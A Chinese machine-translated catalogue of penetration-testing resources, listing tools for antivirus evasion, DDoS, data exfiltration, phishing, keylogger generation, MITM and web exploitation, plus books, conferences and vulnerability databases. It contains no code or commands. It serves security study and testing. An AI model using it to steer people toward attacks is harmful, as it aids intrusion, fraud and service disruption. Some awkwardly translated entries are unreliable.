精华内容
参与话题
问答
  • 最全渗透测试工具讲解

    千人学习 2018-08-31 08:44:31
    渗透测试工具详解视频教程,该课程分为三个部分,1、针对web扫描工具介绍,2、针对抓包工具介绍,3、针对信息探测介绍。(没章节都会将该章节介绍的工具共享给大家)这三部分基本涵盖了渗透测试中百分之80常见工具的...
  • 渗透测试工具

    2013-06-18 21:33:57
    渗透测试工具 1.基于web的测试 2.基于操作系统的测试 3.基于数据库的测试
  • Kali Linux渗透测试工具使用技巧篇

    千人学习 2019-12-26 20:36:13
    本课程主要分享Kali Linux渗透测试工具使用技巧教程! 二、课程目标       本课程致力于帮助广大学员掌握Kali Linux渗透工具使用教程! 三、适合人员       1、...
  • 全自动渗透测试工具

    2018-09-12 10:05:22
    Yuki Chan是一个自动渗透测试工具,将为您审核所有标准安全评估。它是最好的渗透测试工具之一,它提供许多集成安全工具和执行许多渗透测试操作到目标网络。已经有超过15个模块与Yuki chan集成,它是审核网络最强大的...
  • k8渗透测试工具

    2012-04-24 11:23:08
    极品cookie工具,轻松实现攻击,学习和搞站的好东东
  • BurpSuite 渗透测试工具

    2020-07-15 16:40:09
    一款集成型渗透测试工具可用户和android端测试,需要java环境,包含中文操作指南教程。源于官网文档翻译和大牛经验总结
  • 匿名工具 I2P- 隐形互联网项目。 Nipe- 用于将所有流量从计算机重定向到Tor网络的脚本。... 每个浏览器都知道的内容- 全面的检测页面,用于测试您自己的Web浏览器的隐私和身份泄漏配置。 dos-over-to...

    匿名工具

    • I2P - 隐形互联网项目。
    • Nipe - 用于将所有流量从计算机重定向到Tor网络的脚本。
    • OnionScan - 通过查找Tor隐藏服务运营商引入的操作安全问题来调查Dark Web的工具。
    • Tor - 免费软件和洋葱路由覆盖网络,可帮助您防御流量分析。
    • 每个浏览器都知道的内容 - 全面的检测页面,用于测试您自己的Web浏览器的隐私和身份泄漏配置。
    • dos-over-tor - Tor压力测试工具的概念验证拒绝服务。
    • kalitorify - 通过Tor为Kali Linux OS提供透明代理。

    防病毒逃生工具

    • AntiVirus Evasion Tool(AVET) - 包含针对Windows机器的可执行文件的后处理漏洞,以避免被防病毒软件识别。
    • Hyperion - 用于32位可移植可执行文件的运行时加密程序(“PE .exes”)。
    • Shellter - 动态shellcode注入工具,以及有史以来第一个真正动态的PE infector。
    • UniByAv - 简单的混淆器,它使用原始shellcode并使用强制执行的32位XOR密钥生成反病毒友好的可执行文件。
    • 面纱 - 生成绕过常见防病毒解决方案的metasploit有效负载。
    • peCloak.py - 自动隐藏来自防病毒(AV)检测的恶意Windows可执行文件的过程。
    • peCloakCapstone - peCloak.py自动恶意软件防病毒逃避工具的多平台分支。
    • shellsploit - 生成自定义shellcode,后门,注入器,可选择通过编码器对每个字节进行混淆。

    图书

    另见DEF CON建议阅读

    防御性编程书籍

    黑客手册系列丛书

    锁定采摘书籍

    恶意软件分析书籍

    网络分析书籍

    渗透测试书籍

    逆向工程书籍

    社会工程书籍

    Windows书籍

    CTF工具

    • Pwntools - 为CTF使用而构建的快速漏洞利用开发框架。
    • RsaCtfTool - 使用弱RSA密钥解密数据,并使用各种自动攻击从公钥恢复私钥。
    • ctf-tools - 安装各种安全研究工具的安装脚本集合,可以轻松快速地部署到新机器上。
    • shellpop - 轻松生成复杂的反向或绑定shell命令,以帮助您在渗透测试期间节省时间。

    协作工具

    • RedELK - 跟踪和报警Blue Team活动,同时在长期攻击行动中提供更好的可用性。

    会议和活动

    • 44Con - 在伦敦举行的年度安全会议。
    • AppSecUSA - 由OWASP组织的年度会议。
    • BSides - 组织和举行安全会议的框架。
    • BalCCon - 巴尔干计算机大会,每年在塞尔维亚诺维萨德举行。
    • 黑帽 - 拉斯维加斯的年度安全会议。
    • BruCON - 比利时年度安全会议。
    • CCC-德国国际黑客现场年会。
    • CHCon - Christchurch Hacker Con,只有新西兰南岛的黑客骗局。
    • CarolinaCon - Infosec会议,每年在北卡罗来纳州举行。
    • DEF CON - 拉斯维加斯的年度黑客大会。
    • DeepSec - 奥地利维也纳安全会议。
    • DefCamp - 东欧最大的安全会议,每年在罗马尼亚布加勒斯特举行。
    • DerbyCon - 位于路易斯维尔的年度黑客大会。
    • Ekoparty - 拉丁美洲最大的安全会议,每年在阿根廷布宜诺斯艾利斯举行。
    • FSec - FSec - 克罗地亚Varaždin的克罗地亚信息安全聚会。
    • HITB - 在马来西亚和荷兰举行的深度知识安全会议。
    • Hack.lu - 年会在卢森堡举行。
    • Hackfest - 加拿大最大的黑客大会。
    • Infosecurity Europe - 欧洲首屈一指的信息安全活动,在英国伦敦举行。
    • LayerOne - 每年春天在洛杉矶举行的年度美国安全会议。
    • Nullcon - 在德里和印度果阿举行的年会。
    • PhreakNIC - 技术会议每年在田纳西州中部举行。
    • RSA会议美国 - 年度安全会议在美国加利福尼亚州旧金山举行。
    • SECUINSIDE - 首尔安全会议。
    • ShmooCon - 年度美国东海岸黑客大会。
    • SkyDogCon - 纳什维尔的技术会议。
    • SummerCon - 夏季举办的最古老的黑客大会之一。
    • 瑞士网络风暴 - 瑞士卢塞恩的年度安全会议。
    • ThotCon - 在芝加哥举行的年度美国黑客大会。
    • Troopers - 年度国际IT安全活动,在德国海德堡举办研讨会。
    • Virus Bulletin Conference - 年会将于2016年在美国丹佛举行。

    Docker容器

    易受攻击系统的Docker容器

    Docker容器的渗透测试分布和工具

    文件格式分析工具

    • Hachoir - 用于查看和编辑二进制流的Python库,作为用于元数据提取的字段和工具树。
    • Kaitai Struct - 文件格式和网络协议剖析语言和Web IDE,使用C ++,C#,Java,JavaScript,Perl,PHP,Python,Ruby生成解析器。
    • Veles - 二进制数据可视化和分析工具。

    GNU / Linux实用程序

    • Hwacha - 用于在一个或多个Linux系统上同时通过SSH快速执行有效负载的后期利用工具。
    • LinEnum - 脚本本地Linux枚举和权限提升检查程序,可用于审核主机和CTF游戏期间。
    • Linux Exploit Suggester - 针对给定GNU / Linux系统的潜在可行漏洞的启发式报告。
    • Lynis - 基于UNIX的系统的审计工具。
    • checksec.sh - 用于测试正在使用的标准Linux OS和PaX安全功能的Shell脚本。
    • unix-privesc-check - 用于检查UNIX系统上的简单权限提升向量的Shell脚本。

    哈希破解工具

    • BruteForce Wallet - 查找加密钱包文件的密码(即wallet.dat)。
    • CeWL - 通过抓取目标网站并收集独特单词来生成自定义单词列表。
    • Hashcat - 更快速的哈希破解者。
    • JWT Cracker - 简单的HS256 JSON Web令牌(JWT)令牌暴力破解器。
    • 开膛手约翰 - 快速密码破解者。
    • Rar Crack - RAR暴力破解者。
    • StegCracker - 用于发现文件中隐藏数据的Steganography强力实用程序。

    十六进制编辑器

    • 0xED - 本机macOS十六进制编辑器,支持插件显示自定义数据类型。
    • Bless - 用Gtk#编写的高质量,全功能,跨平台的图形十六进制编辑器。
    • Frhed - Windows的二进制文件编辑器。
    • Hex Fiend - 用于macOS的快速,开源,十六进制编辑器,支持查看二进制差异。
    • HexEdit.js - 基于浏览器的十六进制编辑。
    • Hexinator - 世界上最好的(专有的,商业的)Hex Editor。
    • hexedit - 简单,快速,基于控制台的十六进制编辑器。
    • wxHexEditor - 适用于GNU / Linux,macOS和Windows的免费GUI十六进制编辑器。

    工业控制和SCADA系统

    另见awesome-industrial-control-system-security

    • 工业开发框架(ISF) - 基于routerploit的类似Metasploit的漏洞利用框架,旨在针对工业控制系统(ICS),SCADA设备,PLC固件等。
    • s7scan - 用于在TCP / IP或LLC网络上枚举Siemens S7 PLC的扫描仪。

    多范式框架

    • Armitage - Metasploit框架的基于Java的GUI前端。
    • AutoSploit - 自动大规模开发者,通过使用Shodan.io API收集目标,并以编程方式选择基于Shodan查询的Metasploit漏洞利用模块。
    • Decker - Penetration测试编排和自动化框架,它允许编写声明性的,可重用的配置,能够摄取变量并使用它作为输入运行的工具的输出。
    • 法拉第 - 为红队执行合作渗透测试,安全审计和风险评估的多用户集成测试环境。
    • Metasploit - 用于攻击性安全团队的软件,用于帮助验证漏洞和管理安全评估。
    • Pupy - 跨平台(Windows,Linux,macOS,Android)远程管理和后期开发工具。

    网络工具

    • CrackMapExec - 用于测试网络的瑞士军刀。
    • IKEForce - 用于Linux的命令行IPSEC VPN暴力破解工具,允许组名/ ID枚举和XAUTH暴力破解功能。
    • Intercepter-NG - 多功能网络工具包。
    • Legion - 基于Python 3并从SPARTA分叉的图形化半自动发现和侦察框架。
    • Network-Tools.com -网站上提供的接口众多基本的网络工具一样pingtraceroutewhois,等等。
    • Praeda - 自动化多功能打印机数据采集器,用于在安全评估期间收集可用数据。
    • 打印机开发工具包(PRET) - 用于打印机安全测试的工具,能够进行IP和USB连接,模糊测试以及利用PostScript,PJL和PCL打印机语言功能。
    • SPARTA - 图形界面,提供对现有网络基础架构扫描和枚举工具的可编写脚本的可配置访问。
    • THC Hydra - 在线密码破解工具,内置支持许多网络协议,包括HTTP,SMB,FTP,telnet,ICQ,MySQL,LDAP,IMAP,VNC等。
    • Zarp - 以攻击本地网络为中心的网络攻击工具。
    • dnstwist - 用于检测拼写错误,网络钓鱼和企业间谍活动的域名置换引擎。
    • dsniff - 用于网络审计和测试的工具集。
    • hping3 - 能够发送自定义TCP / IP数据包的网络工具。
    • impacket - 用于处理网络协议的Python类集合。
    • pig - GNU / Linux数据包制作工具。
    • routersploit - 类似于Metasploit但专用于嵌入式设备的开源开发框架。
    • rshijack - TCP连接劫持者,Rust重写shijack
    • scapy - 基于Python的交互式数据包操作程序和库。

    DDoS工具

    • Anevicon - 基于UDP的强大负载生成器,用Rust编写。
    • HOIC - 低轨道离子炮的更新版本,有“助推器”来解决常见的对抗措施。
    • JS LOIC - LOIC的 JavaScript浏览器版本。
    • LOIC - 适用于Windows的开源网络压力工具。
    • Memcrashed - DDoS攻击工具,用于将伪造的UDP数据包发送到使用Shodan API获取的易受攻击的Memcached服务器。
    • SlowLoris - 在攻击方使用低带宽的DoS工具。
    • T50 - 更快的网络压力工具。
    • UFONet - 滥用OSI第7层HTTP来创建/管理“僵尸”并使用其进行不同的攻击; GETPOST,多线程,代理,原始欺骗方法,缓存规避技术等。

    Exfiltration工具

    • Cloakify - 文本隐写术工具包,可将任何文件类型转换为日常字符串列表。
    • DET - 使用单个或多个通道同时执行数据泄漏的概念证明。
    •  - 通过DNS服务器隧道传输IPv4数据; 对于从防火墙访问互联网的网络中进行渗透非常有用,但允许进行DNS查询。
    • pwnat - 在防火墙和NAT中打孔。
    • tgcd - 简单的Unix网络实用程序,用于扩展基于TCP / IP的网络服务在防火墙之外的可访问性。

    网络侦察工具

    • ACLight - 用于高级发现敏感特权帐户的脚本 - 包括Shadow Admins。
    • CloudFail - 通过搜索旧数据库记录并检测配置错误的DNS,揭示隐藏在Cloudflare后面的服务器IP地址。
    • DNSDumpster - 在线DNS侦察和搜索服务。
    • Mass Scan - TCP端口扫描程序,异步喷出SYN数据包,在5分钟内扫描整个Internet。
    • ScanCannon - Python脚本,通过调用masscan快速识别开放端口,然后nmap获取有关这些端口上的系统/服务的详细信息,快速枚举大型网络。
    • XRay - 网络(子)域发现和侦察自动化工具。
    • dnsenum - Perl脚本,用于枚举域中的DNS信息,尝试区域传输,执行强力字典样式攻击,然后对结果执行反向查找。
    • dnsmap - 被动DNS网络映射器。
    • dnsrecon - DNS枚举脚本。
    • dnstracer - 确定给定DNS服务器从哪里获取其信息,并遵循DNS服务器链。
    • fierce - fierce.pl用于定位非连续IP空间的原始DNS侦察工具的Python3端口。
    • nmap - 用于网络探索和安全审计的免费安全扫描程序。
    • passivedns-client - 用于查询多个被动DNS提供程序的库和查询工具。
    • passivedns - 网络嗅探器,记录所有DNS服务器回复,以便在被动DNS设置中使用。
    • scanless - 用于代表您使用网站执行端口扫描的实用程序,以便不显示您自己的IP。
    • smbmap - 方便的SMB枚举工具。
    • zmap - 开源网络扫描仪,使研究人员能够轻松执行互联网范围的网络研究。

    协议分析仪和嗅探器

    • Debookee - 用于macOS的简单而强大的网络流量分析器。
    • Dripcap - 含咖啡因的包装分析仪。
    • Dshell - 网络取证分析框架。
    • Netzob - 反向工程,流量生成和通信协议的模糊测试。
    • Wireshark - 广泛使用的图形化,跨平台网络协议分析仪。
    • netsniff-ng - 用于网络嗅探的瑞士军刀。
    • sniffglue - 安全的多线程数据包嗅探器。
    • tcpdump / libpcap - 在命令行下运行的通用数据包分析器。

    代理和中间机器(MITM)工具

    • BetterCAP - 模块化,可移植且易于扩展的MITM框架。
    • Ettercap - 全面,成熟的机器中间攻击套件。
    • Habu - Python实用程序实现各种网络攻击,例如ARP中毒,DHCP饥饿等。
    • Lambda-Proxy - 用于测试AWS Lambda无服务器功能上的SQL注入漏洞的实用程序。
    • MITMf - 中间人攻击框架。
    • Morpheus - 自动ettercap TCP / IP劫持工具。
    • SSH MITM - 使用代理拦截SSH连接; 所有明文密码和会话都记录在磁盘上。
    • dnschef - 用于测试人员的高度可配置的DNS代理。
    • evilgrade - 通过注入虚假更新来利用不良升级实现的模块化框架。
    • mallory - SSH上的HTTP / HTTPS代理。
    • mitmproxy - 支持交互式TLS的拦截HTTP代理,用于渗透测试人员和软件开发人员。
    • oregano - 作为中间机器(MITM)运行的Python模块,接受Tor客户端请求。

    传输层安全工具

    • SSLyze - 快速而全面的TLS / SSL配置分析器,可帮助识别安全性错误配置。
    • crackpkcs12 - 用于破解PKCS#12文件(.p12.pfx扩展)的多线程程序,例如TLS / SSL证书。
    • testssl.sh - 命令行工具,用于检查任何端口上的服务器服务,以支持TLS / SSL密码,协议以及一些加密缺陷。
    • tls_prober - 指纹服务器的SSL / TLS实现。

    无线网络工具

    • Aircrack-ng - 用于审计无线网络的工具集。
    • Airgeddon - 用于Linux系统的多用途bash脚本,用于审计无线网络。
    • BoopSuite - 用Python编写的无线审计工具套件。
    • 欺负 - 用C语言写的WPS暴力攻击的实施
    • Cowpatty - 对WPA-PSK的暴力字典攻击。
    • Fluxion - 基于自动社交工程的WPA攻击套件。
    • KRACK Detector - 检测并防止网络中的KRACK攻击。
    • Kismet - 无线网络探测器,嗅探器和IDS。
    • 掠夺者 - 对WiFi保护设置的暴力攻击。
    • WiFi-Pumpkin - 流氓Wi-Fi接入点攻击框架。
    • Wifite - 自动无线攻击工具。
    • infernal-twin - 自动无线黑客工具。
    • krackattacks-scripts - WPA2 Krack攻击脚本。
    • wifi-arsenal - 用于Wi-Fi Pentesting的资源。

    网络漏洞扫描程序

    • Nessus - 由Tenable销售的商业漏洞管理,配置和合规性评估平台。
    • Netsparker应用程序安全扫描程序 - 应用程序安全扫描程序自动查找安全漏洞。
    • Nexpose - 商业漏洞和风险管理评估引擎,与Rapid7销售的Metasploit集成。
    • OpenVAS - 流行的Nessus漏洞评估系统的免费软件实现。
    • Vuls - 用于GNU / Linux和FreeBSD的无代理漏洞扫描程序,用Go编写。

    Web漏洞扫描程序

    • ACSTIS - AngularJS的自动客户端模板注入(沙箱转义/旁路)检测。
    • Arachni - 用于评估Web应用程序安全性的可编写脚本的框架。
    • JCS - 具有来自exploitdb和packetstorm的自动数据库更新程序的Joomla漏洞组件扫描程序。
    • Netsparker应用程序安全扫描程序 - 应用程序安全扫描程序自动查找安全漏洞。
    • Nikto - 嘈杂但快速的黑匣子Web服务器和Web应用程序漏洞扫描程序。
    • SQLmate - sqlmap根据给定的dork和(可选)网站识别SQLi漏洞的朋友。
    • SecApps - 浏览器内Web应用程序安全测试套件。
    • WPScan - 黑匣子WordPress漏洞扫描程序。
    • Wapiti - 内置模糊器的黑匣子Web应用程序漏洞扫描程序。
    • WebReaver - 专为macOS设计的商业,图形Web应用程序漏洞扫描程序。
    • cms-explorer - 显示由内容管理系统驱动的各种网站正在运行的特定模块,插件,组件和主题。
    • joomscan - Joomla漏洞扫描程序。
    • w3af - Web应用程序攻击和审计框架。

    OSINT工具

    • AQUATONE - 子域发现工具,利用各种开源生成报告,可用作其他工具的输入。
    • BinGoo - 基于GNU / Linux bash的Bing和Google Dorking工具。
    • Censys - 通过每日ZMap和ZGrab扫描收集主机和网站上的数据。
    • DataSploit - OSINT可视化工具,在幕后使用Shodan,Censys,Clearbit,EmailHunter,FullContact和Zoomeye。
    • FOCA(收集档案的指纹识别组织) - 自动文档搜集器,可搜索Google,Bing和DuckDuckGo,以查找和推断内部公司组织结构。
    • GooDork - 命令行谷歌dorking工具。
    • Google Hacking Database - Google dorks数据库; 可用于侦察。
    • GyoiThon - GyoiThon是一款使用机器学习的智能收集工具。
    • Hunter.io - 数据代理,提供Web搜索界面,用于发现公司的电子邮件地址和其他组织详细信息。
    • Intrigue - 具有强大API,UI和CLI的自动OSINT和Attack Surface发现框架。
    • Maltego - 来自Paterva的开源智能和取证专有软件。
    • OWASP Amass - 通过抓取,网络存档,暴力破解,排列,反向DNS扫描,TLS证书,被动DNS数据源等子域名枚举。
    • PacketTotal - 简单,免费,高质量的数据包捕获文件分析,有助于快速检测网络传播的恶意软件(使用Bro和Suricata IDS签名)。
    • Shodan - 世界上第一个用于互联网设备的搜索引擎。
    • SimplyEmail - 电子邮件侦察快速简便。
    • Sn1per - 自动Pentest Recon扫描仪。
    • Spiderfoot - 具有Web UI和报告可视化的多源OSINT自动化工具。
    • 威胁人群 - 威胁搜索引擎。
    • Virus Total - 免费服务,可分析可疑文件和URL,并有助于快速检测病毒,蠕虫,特洛伊木马和各种恶意软件。
    • ZoomEye - 网络空间搜索引擎,让用户可以找到特定的网络组件。
    • 令人毛骨悚然 - 地理定位OSINT工具。
    • dork-cli - 命令行谷歌dork工具。
    • dorks - 谷歌黑客数据库自动化工具。
    • 快速侦察 - 针对域名执行Google dorks。
    • gOSINT - 具有多个模块和电报刮刀的OSINT工具。
    • github-dorks - 用于扫描GitHub repos /组织以查找潜在敏感信息泄漏的CLI工具。
    • 图像匹配 - 快速搜索数十亿图像。
    • metagoofil - 元数据收集器。
    • pagodo - 自动化Google Hacking Database抓取。
    • recon-ng - 用Python编写的全功能Web侦察框架。
    • sn0int - 半自动OSINT框架和包管理器。
    • 告密者 -通过信息收集dorks。
    • surfraw - 快速UNIX命令行界面,适用于各种流行的WWW搜索引擎。
    • theHarvester - 电子邮件,子域和人名收割机。
    • vcsmap - 基于插件的工具,用于扫描公共版本控制系统以获取敏感信息。

    在线资源

    在线代码示例和示例

    在线攻击开发资源

    在线锁定拣选资源

    在线开源智能(OSINT)资源

    • CertGraph - 为其证书替代名称抓取域的SSL / TLS证书。
    • GhostProject - 可搜索的数十亿明文密码数据库,部分可见免费。
    • 英特尔技术 - OSINT工具的集合。左侧的菜单可用于浏览类别。
    • NetBootcamp OSINT工具 - OSINT链接的集合和其他服务的自定义Web界面。
    • OSINT Framework - 按类别划分的各种OSINT工具的集合。
    • WiGLE.net - 有关全球无线网络的信息,具有用户友好的桌面和Web应用程序。

    在线操作系统资源

    在线渗透测试资源

    社会工程资源

    其他在线列表

    渗透测试报告模板

    操作系统分发

    • Android Tamer - 为Android安全专业人员构建的分发版,包括Android安全测试所需的工具。
    • ArchStrike - 为安全专业人士和爱好者提供Arch GNU / Linux存储库。
    • AttifyOS - GNU / Linux发行版专注于物联网(IoT)安全评估中有用的工具。
    • BackBox - 基于Ubuntu的渗透测试和安全评估分发。
    • BlackArch - 基于GNU / Linux的渗透测试人员和安全研究人员。
    • Buscador - 为在线调查员预先配置的GNU / Linux虚拟机。
    • Kali - 基于Debian的滚动GNU / Linux发行版,专为渗透测试和数字取证而设计。
    • Network Security Toolkit(NST) - 基于Fedora的GNU / Linux可启动实时操作系统,旨在提供对最佳开源网络安全应用程序的轻松访问。
    • Parrot - 与Kali类似的分发,支持多种硬件架构。
    • PentestBox - Windows操作系统的开源预配置便携式渗透测试环境。
    • Pentesters Framework - Distro围绕渗透测试执行标准(PTES)进行组织,提供了一个策划的实用程序集合,省略了不太常用的实用程序。

    期刊

    物理访问工具

    • AT命令 - 通过Android设备的USB端口使用AT命令重写设备固件,绕过安全机制,泄露敏感信息,执行屏幕解锁和注入触摸事件。
    • Bash Bunny - 以USB拇指驱动器形式的本地漏洞利用程序交付工具,您可以在名为BunnyScript的DSL中编写有效负载。
    • LAN Turtle - 隐藏式“USB以太网适配器”,可在本地网络中安装时提供远程访问,网络情报收集和MITM功能。
    • PCILeech - 使用PCIe硬件设备通过PCIe上的直接内存访问(DMA)从目标系统内存进行读写。
    • Packet Squirrel - 以太网多工具,旨在通过交换机启用隐蔽远程访问,无痛数据包捕获和安全VPN连接。
    • Poisontap - 虹吸式 cookie,暴露内部(LAN端)路由器并在锁定的计算机上安装Web后门。
    • Proxmark3 - RFID / NFC克隆,重放和欺骗工具包,通常用于分析和攻击感应卡/读卡器,无线钥匙/钥匙扣等。
    • USB Rubber Ducky - 可定制的击键注入攻击平台伪装成USB拇指驱动器。
    • WiFi Pineapple - 无线审计和渗透测试平台。

    逆向工程工具

    另见awesome-reversing

    • Capstone - 轻量级多平台,多架构拆卸框架。
    • Evan的调试器 - 类似于OllyDbg的GNU / Linux调试器。
    • Frida - 面向开发人员,逆向工程师和安全研究人员的动态检测工具包。
    • Ghidra - 由NSA研究理事会开发的免费软件逆向工程工具套件,最初在维基解密的“Vault 7”出版物中公开,现在作为开源软件维护。
    • Immunity Debugger - 编写漏洞并分析恶意软件的强大方法。
    • 交互式反汇编程序(IDA Pro) - 用于Windows,GNU / Linux或macOS的专有多处理器反汇编程序和调试程序; 还有免费版,IDA Free
    • Medusa - 开源,跨平台的交互式反汇编程序。
    • OllyDbg - 用于Windows二进制文件的x86调试器,强调二进制代码分析。
    • PyREBox - Cisco-Talos的Python脚本化逆向工程沙箱。
    • Radare2 - 开源,平台逆向工程框架。
    • UEFITool - UEFI固件映像查看器和编辑器。
    • Voltron - 用Python编写的可扩展调试器UI工具包。
    • WDK / WinDbg - Windows驱动程序工具包和WinDbg。
    • binwalk - 快速,易用的工具,用于分析,逆向工程和提取固件映像。
    • boxxy - 可链接的沙盒浏览器。
    • dnSpy - 反向工程.NET程序集的工具。
    • peda - 针对GDB的Python漏洞利用开发协助。
    • plasma - 用于x86 / ARM / MIPS的交互式反汇编程序。使用彩色语法代码生成缩进的伪代码。
    • pwndbg - GDB插件,可简化GDB调试,重点关注低级软件开发人员,硬件黑客,逆向工程师和漏洞利用开发人员所需的功能。
    • rVMI - 类固醇调试器; 在单个工具中检查用户空间进程,内核驱动程序和预引导环境。
    • x64dbg - 用于Windows的开源x64 / x32调试器。

    安全教育课程

    侧通道工具

    社会工程工具

    • Beelogger - 用于生成keylooger的工具。
    • Catphish - 用Ruby编写的网络钓鱼和企业间谍工具。
    • Evilginx2 - 独立的man-in-the-middle攻击框架。
    • Evilginx - 用于任何Web服务的网络钓鱼凭据和会话cookie的MITM攻击框架。
    • FiercePhish - 完善的网络钓鱼框架,用于管理所有网络钓鱼活动。
    • Gophish - 开源网络钓鱼框架。
    • King Phisher - 网络钓鱼活动工具包,用于使用自定义电子邮件和服务器内容创建和管理多个同时网络钓鱼攻击。
    • Modlishka - 灵活而强大的反向代理,具有实时双因素身份验证。
    • ReelPhish - 实时双因素网络钓鱼工具。
    • ShellPhish - 在SocialFish上建立的社交媒体网站克隆和网络钓鱼工具。
    • 社会工程师工具包(SET) - 为社会工程设计的开源测试框架,具有许多自定义攻击向量,可以快速进行可信的攻击。
    • SocialFish - 社交媒体网络钓鱼框架,可以在Android手机或Docker容器中运行。
    • phishery - 启用TLS / SSL的Basic Auth凭证收集器。
    • wifiphisher - 针对WiFi网络的自动网络钓鱼攻击。

    静态分析仪

    • Brakeman - 用于Ruby on Rails应用程序的静态分析安全漏洞扫描程序。
    • FindBugs - 免费软件静态分析器,用于查找Java代码中的错误。
    • Progpilot - 用于PHP代码的静态安全分析工具。
    • RegEx-DoS - 分析易受拒绝服务攻击的正则表达式的源代码。
    • 强盗 - 面向安全的Python代码静态分析器。
    • cppcheck - 可扩展的C / C ++静态分析器专注于发现错误。
    • sobelow - 针对凤凰城框架的以安全为中心的静态分析。

    漏洞数据库

    • Bugtraq(BID) - 软件安全漏洞识别数据库,根据提交给SecurityFocus邮件列表和其他来源(由Symantec,Inc。运营)编译而成。
    • CXSecurity - 已发布的CVE和Bugtraq软件漏洞存档与Google dork数据库交叉引用,用于发现列出的漏洞。
    • 中国国家漏洞数据库(CNNVD) - 中国政府运行的漏洞数据库,类似于由Mitre Corporation主办的美国CVE数据库。
    • 常见漏洞和暴露(CVE) - 公共名称字典(即CVE标识符),用于公开的安全漏洞。
    • 分布式弱点归档(DWF) - 联合CNA(CVE号码管理机构)镜像MITRE的CVE数据库,并提供额外的CVE等效数字,以覆盖其他范围外的漏洞披露。
    • Exploit-DB - 非营利性项目托管软件漏洞的攻击,由攻击性安全部门提供公共服务。
    • 完全披露 - 公开的,供应商中立的论坛,详细讨论漏洞,通常在许多其他来源之前发布详细信息。
    • HPI-VDB - 由波茨坦Hasso-Plattner研究所提供的交叉引用软件漏洞的聚合器,提供免费的API访问。
    • Inj3ct0r - 利用市场和漏洞信息聚合器。(洋葱服务。)
    • Microsoft安全建议 - 影响Microsoft软件的安全建议存档。
    • Microsoft安全公告 - Microsoft安全响应中心(MSRC)发布的Microsoft软件中发现的安全问题的公告。
    • Mozilla Foundation Security Advisories - 影响Mozilla软件的安全建议存档,包括Firefox Web浏览器。
    • 国家漏洞数据库(NVD) - 美国政府的国家漏洞数据库提供标准CVE列表的附加元数据(CPE,CVSS评分)以及细粒度的搜索引擎。
    • 数据包风暴 - 整个行业聚合的漏洞利用,建议,工具和其他与安全相关的资源汇编。
    • SecuriTeam - 软件漏洞信息的独立来源。
    • US-CERT漏洞说明数据库 - 由美国计算机紧急响应小组(US-CERT)汇总的摘要,技术详细信息,补救信息以及受软件漏洞影响的供应商列表。
    • 漏洞实验室 - 根据漏洞利用目标类别组织的安全建议开放论坛。
    • Vulners - 软件漏洞的安全数据库。
    • 零日活动 - 由TippingPoint运营的Bug赏金计划,其中包含已公布的安全建议的公开存档档案。

    网络开发

    • BlindElephant - Web应用程序指纹识别器。
    • 浏览器漏洞利用框架(BeEF) - 用于向被征用的 Web浏览器提供漏洞利用的命令和控制服务器。
    • Burp Suite - 用于执行Web应用程序安全性测试的集成平台。
    • Commix - 自动化一体化操作系统命令注入和利用工具。
    • DVCS Ripper - Rip Web可访问(分布式)版本控制系统:SVN / GIT / HG / BZR。
    • EyeWitness - 用于截取网站屏幕截图,提供一些服务器标头信息以及识别默认凭据的工具(如果可能)。
    • Fiddler - 免费的跨平台Web调试代理,具有用户友好的配套工具。
    • FuzzDB - 用于黑盒应用程序故障注入和资源发现的攻击模式和原语词典。
    • GitTools - 自动查找和下载Web可访问的.git存储库。
    • Kadabra - 自动LFI开发者和扫描仪。
    • Kadimus - LFI扫描和利用工具。
    • NoSQLmap - 自动NoSQL注入和数据库接管工具。
    • OWASP Zed攻击代理(ZAP) - 用于渗透测试Web应用程序的功能丰富,可编写脚本的HTTP拦截代理和模糊器。
    • 攻击性Web测试框架(OWTF) - 基于Python的框架,用于基于OWASP测试指南测试Web应用程序。
    • Raccoon - 用于侦察和漏洞扫描的高性能攻击性安全工具。
    • SQLmap - 自动SQL注入和数据库接管工具。
    • VHostScan - 执行反向查找的虚拟主机扫描程序,可与数据透视工具一起使用,检测全能方案,别名和动态默认页面。
    • WPSploit - 利用Metasploit利用WordPress驱动的网站。
    • Wappalyzer - Wappalyzer揭示了网站上使用的技术。
    • WhatWaf - 检测并绕过Web应用程序防火墙和保护系统。
    • WhatWeb - 网站指纹识别器。
    • Wordpress漏洞利用框架 - 用于开发和使用模块的Ruby框架,有助于对WordPress驱动的网站和系统进行渗透测试。
    • autochrome - 使用来自NCCGroup的本机Burp支持,轻松安装具有所需的所有适当设置的测试浏览器。
    • badtouch - 可编写脚本的网络身份验证破解程序。
    • fimap - 自动查找,准备,审核,利用甚至谷歌的LFI / RFI错误。
    • liffy - LFI开发工具。
    • recursebuster - 用于执行目录和文件强制执行的内容发现工具。
    • sslstrip2 - SSLStrip版本击败HSTS。
    • sslstrip - 证明HTTPS剥离攻击。
    • tplmap - 自动服务器端模板注入和Web服务器接管工具。
    • wafw00f - 标识和指纹Web应用程序防火墙(WAF)产品。
    • webscreenshot - 从网站列表中截取网站截图的简单脚本。
    • weevely3 - 基于PHP的武器化Web外壳。

    Windows实用工具

    • Active Directory和权限提升(ADAPE) - Umbrella脚本,可自动执行大量有用的PowerShell模块,以发现安全性错误配置并尝试针对Active Directory进行权限提升。
    • Bloodhound - 图形Active Directory信任关系资源管理器。
    • Commando VM - 自动安装140多个Windows软件包,用于渗透测试和红色组合。
    • Covenant - ASP.NET核心应用程序,作为红色teamers的协作命令和控制平台。
    • DeathStar - 使用Empire的RESTful API自动获取Active Directory环境中的域管理员权限的Python脚本。
    • 帝国 - 纯PowerShell后期开发代理。
    • Fibratus - 用于探索和跟踪Windows内核的工具。
    • LaZagne - 凭证恢复项目。
    • Magic Unicorn - 用于众多攻击媒介的Shellcode生成器,包括Microsoft Office宏,PowerShell,HTML应用程序(HTA)或certutil(使用假证书)。
    • MailSniper - 用于在Microsoft Exchange环境中搜索电子邮件,从Outlook Web Access(OWA)和Exchange Web服务(EWS)收集全局地址列表等的模块化工具。
    • PowerSploit - PowerShell后利用框架。
    • RID_ENUM - 可以枚举Windows域控制器中所有用户并使用暴力破解这些用户密码的Python脚本。
    • 响应者 - 链路本地多播名称解析(LLMNR),NBT-NS和mDNS中毒。
    • 标尺 - 滥用客户端Outlook功能以获取Microsoft Exchange服务器上的远程shell。
    • SCOMDecrypt - 检索并解密存储在Microsoft System Center Operations Manager(SCOM)数据库中的RunAs凭据。
    • Sysinternals Suite - Sysinternals疑难解答实用程序。
    • Windows凭据编辑器 - 检查登录会话并添加,更改,列出和删除关联的凭据,包括Kerberos票证。
    • Windows漏洞利用建议器 - 检测目标上可能缺少的补丁。
